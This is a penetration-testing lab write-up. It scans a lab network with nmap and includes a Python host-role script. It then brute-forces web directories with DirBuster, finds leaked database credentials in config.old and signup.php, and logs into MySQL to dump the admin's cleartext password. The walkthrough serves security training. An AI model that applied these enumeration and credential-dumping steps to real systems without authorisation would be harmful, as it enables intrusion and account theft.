Let's see how to brute-force directories using the DirBuster and dirb tools.
Description
You are a Penetration Tester hired by the company AwdMgmt to perform security tests on their internal Web Application and machines. You are asked to perform the penetration test on the client premises. During this engagement you are not given a well-defined scope. You are sitting in the client corporate building, directly attached to the client network.
Goal
The goal of this lab is to first find the web servers in the network you are directly attached to, then to test the Web Application running on them in order to check whether you can access restricted areas (such as the login page).
Tools
The best tools for this lab are:
Dirbuster
mysql
Web browser
Steps
Find all the machines in the network
Since we do not have any information about the network and related hosts, the first step is to find all alive hosts in the network.
Identify the machines' roles
Now that we know there is a host on the target network, let us scan it and gather as much information as we can about it. We are interested in web servers.
Explore the web application
Once we have found a web server explore the Web Application from a web browser and analyze it.
Remember that the goal of our tests is to access the restricted web area.
Find hidden files
Now that you have an idea of how the Web Application works, run dirbuster and check if there is any file that may be useful to access the login page!
Test the credentials found
You should have found two interesting files. Use the information stored in these two files to access the DBMS.
Retrieve the correct admin password
Now that you have access to the database, dump the administrator credentials and try to log into the Web Application.
Solutions
We are now connected to the enterprise network of AwdMgmt.
Our address on the tap0 interface is 10.104.11.50/24, so the directly attached network is 10.104.11.0/24. A host discovery sweep of that range turned up two live hosts, 10.104.11.96 and 10.104.11.198.
Now let's discover the open ports and services on .96 and .198 with nmap (-sS SYN scan, -sV service version detection):
┌──(kali㉿kali)-[~]
└─$ sudo nmap -sS -sV 10.104.11.96,198 -vv
[sudo] password for kali:
Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-21 08:05 EDT
NSE: Loaded 45 scripts for scanning.
Initiating ARP Ping Scan at 08:05
Scanning 2 hosts [1 port/host]
Completed ARP Ping Scan at 08:05, 0.39s elapsed (2 total hosts)
Initiating Parallel DNS resolution of 2 hosts. at 08:05
Completed Parallel DNS resolution of 2 hosts. at 08:05, 5.56s elapsed
Initiating SYN Stealth Scan at 08:05
Scanning 2 hosts [1000 ports/host]
Discovered open port 80/tcp on 10.104.11.96
Discovered open port 22/tcp on 10.104.11.198
Discovered open port 22/tcp on 10.104.11.96
Discovered open port 3306/tcp on 10.104.11.198
Completed SYN Stealth Scan against 10.104.11.96 in 23.00s (1 host left)
Completed SYN Stealth Scan at 08:05, 23.95s elapsed (2000 total ports)
Initiating Service scan at 08:05
Scanning 4 services on 2 hosts
Completed Service scan at 08:05, 6.69s elapsed (4 services on 2 hosts)
NSE: Script scanning 2 hosts.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.41s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 08:05
Completed NSE at 08:05, 1.33s elapsed
Nmap scan report for 10.104.11.96
Host is up, received arp-response (0.33s latency).
Scanned at 2021-08-21 08:05:10 EDT for 40s
Not shown: 998 closed ports
Reason: 998 resets
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.2.22 ((Debian))
MAC Address: 00:50:56:A5:41:5F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Nmap scan report for 10.104.11.198
Host is up, received arp-response (0.33s latency).
Scanned at 2021-08-21 08:05:10 EDT for 39s
Not shown: 998 closed ports
Reason: 998 resets
PORT     STATE SERVICE REASON         VERSION
22/tcp   open  ssh     syn-ack ttl 64 OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)
3306/tcp open  mysql   syn-ack ttl 64 MySQL 5.5.38-0+wheezy1
MAC Address: 00:50:56:A5:41:5F (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 41.43 seconds
Raw packets sent: 2063 (90.740KB) | Rcvd: 2559 (182.859KB)
┌──(kali㉿kali)-[~]
└─$
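The two steps above (a host discovery sweep of the attached /24, then a port and service scan of the live hosts) can be scripted so the web and database servers are picked out automatically. The following is an added example written for this writeup; it is not the lab's tooling and not part of nmap. It shells out to nmap with grepable output (-oG) when given a subnet, which needs nmap installed and sudo for the ARP sweep and SYN scan; the parsing functions work on text and are demonstrated offline on a constructed sample that mirrors the scan output above. The port and service lists used for role tagging are my own choice.

```python
"""Find live hosts on the attached subnet and tag each by role (web / db).

Added example for this writeup, not the lab's own tooling and not part of nmap.
run_nmap needs nmap and sudo; the parsing functions are pure and are exercised
on SAMPLE_SWEEP / SAMPLE_SCAN, constructed to mirror the scan in the writeup.
"""
from __future__ import annotations

import re
import subprocess
import sys

# Role tagging lists: my own choice, extend as needed.
WEB_SERVICES = {"http", "https", "http-proxy", "http-alt"}
DB_SERVICES = {"mysql", "postgresql", "ms-sql-s", "oracle-tns"}
WEB_PORTS = {80, 443, 8080, 8443}
DB_PORTS = {3306, 5432, 1433, 1521}


def run_nmap(args: list[str]) -> str:
    """Run nmap and return its grepable (-oG) output as text."""
    cmd = ["sudo", "nmap", "-oG", "-", *args]
    return subprocess.run(cmd, capture_output=True, text=True, check=True).stdout


def live_hosts(gnmap: str) -> list[str]:
    """IPs reported 'Status: Up' in the output of `nmap -sn -oG -`."""
    return re.findall(r"^Host: (\S+) \(.*?\)\s+Status: Up", gnmap, re.M)


def open_ports(gnmap: str) -> dict[str, list[tuple[int, str, str]]]:
    """Map ip -> [(port, service, version)] for open ports in a -oG port scan.

    Each entry of the Ports: field is port/state/proto/owner/service/rpc/version/.
    """
    result: dict[str, list[tuple[int, str, str]]] = {}
    for line in gnmap.splitlines():
        if not line.startswith("Host:") or "Ports:" not in line:
            continue
        # -oG fields are tab separated: "Host: ...", "Ports: ...", "Ignored State: ..."
        fields = dict(f.split(": ", 1) for f in line.split("\t") if ": " in f)
        ip = fields["Host"].split()[0]
        for entry in fields["Ports"].split(", "):
            port, state, _proto, _owner, service, _rpc, version = entry.split("/", 6)
            if state == "open":
                result.setdefault(ip, []).append((int(port), service, version.rstrip("/")))
    return result


def roles(ports: dict[str, list[tuple[int, str, str]]]) -> dict[str, set[str]]:
    """Tag each host 'web' and/or 'db' from its open ports and service names."""
    tags: dict[str, set[str]] = {}
    for ip, entries in ports.items():
        tags[ip] = set()
        for port, service, _version in entries:
            if service in WEB_SERVICES or port in WEB_PORTS:
                tags[ip].add("web")
            if service in DB_SERVICES or port in DB_PORTS:
                tags[ip].add("db")
    return tags


# Constructed sample (not real nmap output) mirroring the two hosts found above.
SAMPLE_SWEEP = (
    "# Nmap 7.91 scan initiated as: nmap -sn -oG - 10.104.11.0/24\n"
    "Host: 10.104.11.96 ()\tStatus: Up\n"
    "Host: 10.104.11.198 ()\tStatus: Up\n"
    "# Nmap done -- 256 IP addresses (2 hosts up) scanned\n"
)
SAMPLE_SCAN = (
    "Host: 10.104.11.96 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)/, "
    "80/open/tcp//http//Apache httpd 2.2.22 ((Debian))/\tIgnored State: closed (998)\n"
    "Host: 10.104.11.198 ()\tPorts: 22/open/tcp//ssh//OpenSSH 6.0p1 Debian 4+deb7u2 (protocol 2.0)/, "
    "3306/open/tcp//mysql//MySQL 5.5.38-0+wheezy1/\tIgnored State: closed (998)\n"
)

if __name__ == "__main__":
    if len(sys.argv) > 1:   # live run: python3 find_roles.py 10.104.11.0/24
        hosts = live_hosts(run_nmap(["-sn", sys.argv[1]]))
        scan = run_nmap(["-sS", "-sV", "-p", "22,80,443,3306,8080", *hosts])
    else:                   # offline demo on the constructed sample
        hosts, scan = live_hosts(SAMPLE_SWEEP), SAMPLE_SCAN
    tags = roles(open_ports(scan))
    for ip in hosts:
        print(ip, ",".join(sorted(tags.get(ip, set()))) or "-")
```

Run without arguments it prints the two sample hosts tagged web and db; with a subnet argument it performs the sweep and scan for real. Parsing -oG rather than the human-readable output keeps the script stable across nmap versions.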
Based on the results we now know that an HTTP service (Apache httpd 2.2.22) is running on 10.104.11.96, and that 10.104.11.198 runs a MySQL server (5.5.38) reachable from our position on the network, which is most likely the web application's database. So let's visit http://10.104.11.96/ in a browser and check what site is running on it.
Screenshot: the AwdMgmt site homepage at http://10.104.11.96/.
Now that we have the site, let's enumerate its directories and files with DirBuster.
DirBuster takes a wordlist and requests every entry (optionally combined with a list of file extensions) against the target, reporting which paths exist based on the HTTP response code. Alternatives to DirBuster are dirb, ffuf or wfuzz.
Let's proceed with the DirBuster tool:
Enter the target URL (http://10.104.11.96/).
Select the number of threads.
Select the wordlist file; I used directory-list-2.3-medium.txt (on Kali it lives under /usr/share/wordlists/dirbuster/).
Specify the extensions to search for. The application is written in PHP, and leftover copies such as .old, .bak or .txt files are exactly what we hope to find.
Run DirBuster.
DirBuster now lists a number of directories and files on the site.
In the staff directory we find a note at this path,
http://10.104.11.96/staff/readme.txt, which shows the following.
Looking more closely at the other results, we also found an old configuration file, config.old (saved locally as config(1).old), containing database credentials for the user awd.
Those credentials turned out to be wrong or expired: the database rejects the user awd. Note also that the file points at 127.0.0.1, whereas the only MySQL server we found is on 10.104.11.198, so that is where we try the credentials.
We then found the page http://10.104.11.96/signup.php, which contained the current database credentials (user awdmgmt). With those we were able to connect to the MySQL server on 10.104.11.198, the database behind the web site.
┌──(kali㉿kali)-[~/Downloads]
└─$ cat config\(1\).old
<?php
$dbhostname='127.0.0.1';
$dbuser='awd';
$dbpassword='UcuicjsQgG0FILdjdL8D';
$dbname='awd';
$connection = mysqli_connect($dbhostname, $dbuser, $dbpassword, $dbname) or die("Unable to connect to MySQL");
/*
$pages = array (
'index.php?a=announce.txt' => 'Home',
'news.php' => 'News',
'pubs.php' => 'Publications',
'#' => 'Sing up'
);
*/
$pages = array (
'index.php' => 'Home',
'news.php' => 'News',
'awards.php' => 'Awards',
'offline.php' => 'Sing up'
);
?>
First we try the credentials from config.old against the MySQL server on 10.104.11.198. Note that when -p is followed by a space, mysql prompts for the password and treats the next word as the database name; to pass the password on the command line use -pUcuicjsQgG0FILdjdL8D with no space, or simply type it at the prompt. Either way the old password is rejected:
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awd -p UcuicjsQgG0FILdjdL8D
Enter password:
ERROR 1045 (28000): Access denied for user 'awd'@'10.104.11.50' (using password: YES)
The awdmgmt user from signup.php is denied without a password, and accepted with it:
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt
ERROR 1045 (28000): Access denied for user 'awdmgmt'@'10.104.11.50' (using password: NO)
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 272
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]>
Now let's log in again and look through the database for the web application's account table and the admin password.
┌──(kali㉿kali)-[~/Downloads]
└─$ mysql -h 10.104.11.198 -u awdmgmt -p
Enter password:
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 465
Server version: 5.5.38-0+wheezy1 (Debian)
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> use awdmgmt_accounts
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MySQL [awdmgmt_accounts]> show tables;
+----------------------------+
| Tables_in_awdmgmt_accounts |
+----------------------------+
| accounts |
+----------------------------+
1 row in set (0.340 sec)
MySQL [awdmgmt_accounts]> select * from accounts;
+----+--------------------+----------+-------------+
| id | email | password | displayname |
+----+--------------------+----------+-------------+
| 1 | admin@awdmgmt.labs | ENS7VvW8 | Admin |
+----+--------------------+----------+-------------+
1 row in set (0.336 sec)
MySQL [awdmgmt_accounts]> Ctrl-C -- exit!
Aborted
┌──(kali㉿kali)-[~/Downloads]
└─$
We have the admin credentials: admin@awdmgmt.labs with password ENS7VvW8. The password is stored in cleartext rather than hashed, so no cracking is needed; let's go ahead and try it on the site's login page.
Successfully logged in as admin.
That's it for today. See you next time!